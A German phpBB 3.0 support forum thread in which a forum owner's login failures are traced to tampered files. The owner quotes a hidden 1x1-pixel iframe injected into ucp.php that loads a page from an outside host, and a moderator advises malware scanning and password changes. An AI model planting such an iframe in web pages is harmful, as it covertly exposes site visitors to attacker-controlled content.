Keine Anmeldung mehr möglich

Fragen zur Bedienung von phpBB 3.0.x, Probleme bei der Benutzung und alle weiteren Fragen inkl. Update auf die neuste phpBB 3.0.14 Version
Forumsregeln
phpBB 3.0 hat das Ende seiner Lebenszeit überschritten
phpBB 3.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 3.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf die neuste phpBB-Version, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
Antworten
linusmac
Mitglied

Keine Anmeldung mehr möglich

Beitrag von linusmac »

Moin moin,
ich fliege immer wieder raus wenn ich mich anmelden will in meinem Forum http://forum.callas-bremen.de .
Das Forum läuft seit ein paar Wochen und es gab bis heute keine Probleme. Es sind auch nicht viele User
zugegen. Anmeldung erfolgt ausschließlich durch meine Freigabe. Gestern funktionierte noch alles. Dadurch
das ich nach der ersten Anmeldung immer rausfliege komm ich nicht ins ACP.

Was kann ich da machen?
Mahony
Ehemaliges Teammitglied
Re: Keine Anmeldung mehr möglich

Beitrag von Mahony »

Hallo
Zur Fehlermeldung

Code: Alles auswählen

[phpBB Debug] PHP Warning: in file [ROOT]/includes/session.php on line 1035: Cannot modify header information - headers already sent by (output started at [ROOT]/config.php:1)
siehe KB:headers_already_sent

Du solltest also das Zeichen (wahrscheinlich ein Leerzeichen) in der config.php in Zeile 1 entfernen.

Grüße: Mahony
Wer fragt, ist ein Narr für fünf Minuten, wer nicht fragt, ist ein Narr für immer.
linusmac
Mitglied

Beitrag von linusmac »

<?php
    // phpBB 3.0.x auto-generated configuration file
    // Do not change anything in this file!
    $dbms = 'mysql';
    $dbhost = 'localhost';
    $dbport = '';
    $dbname = 'xxxx';
    $dbuser = 'xxxx';
    $dbpasswd = 'xxxx';

$table_prefix = 'phpbb_';
    $acm_type = 'file';
    $load_extensions = '';

@define('PHPBB_INSTALLED', true);
    // @define('DEBUG', true);
    // @define('DEBUG_EXTRA', true);
    ?>
Meines erachtens ist da alles gut, oder kann ich nicht gucken?
Mahony
Ehemaliges Teammitglied

Beitrag von Mahony »

Hallo
Entferne das Leerzeichen vor <?php. Die Fehlermeldung erscheint nicht ohne Grund.

Edit: In der ucp.php hast du ebenfalls in Zeile 1 ein Zeichen, was dort nicht hin gehört.
[phpBB Debug] PHP Warning: in file [ROOT]/includes/functions.php on line 4672: Cannot modify header information - headers already sent by (output started at [ROOT]/ucp.php:1)

Wer fragt, ist ein Narr für fünf Minuten, wer nicht fragt, ist ein Narr für immer.
linusmac
Mitglied

Beitrag von linusmac »

...uhps, das hab ich grad in der ucp Datei gefunden:

<iframe src=http://teamwowka.com/stata.html WIDTH=1 HEIGHT=1 frameborder=0></IFRAME>
Hat das Forum ein Leck gehabt und hat es jemand gefunden? Ach du lieber Himmel :o
linusmac
Mitglied

Beitrag von linusmac »

Über welch eine Sicherheitslücke kann denn jemand in den Dateien die erste Zeile verändern? Es wurden keine
Benutzer angelegt, es wurden keine Threads gelöscht oder sonst was. Der Style prosilver ist völlig im Eimer
und die prosilver special edition bekomme ich auch nicht zum laufen. Subsilver 2 hingegen funzt.
Mahony
Ehemaliges Teammitglied

Beitrag von Mahony »

Hallo
Wenn bei dir (im Forum) Dateien geändert wurden, dann liegt es mit großer Wahrscheinlichkeit daran, dass DU dir (auf deinem PC) einen Virus/Trojaner/Malware eingefangen hast. Die erste Maßnahme sollte also lauten, dass du deinen PC nach Viren|Trojanern|Malware scannst. Natürlich sollten im gleichen Zuge auch alle Passwörter geändert werden und frische phpBB3.0.x-Dateien verwendet werden.
Siehe dazu auch KB:gehackt

Antworten

Zurück zu „[3.0.x] Administration, Benutzung und Betrieb“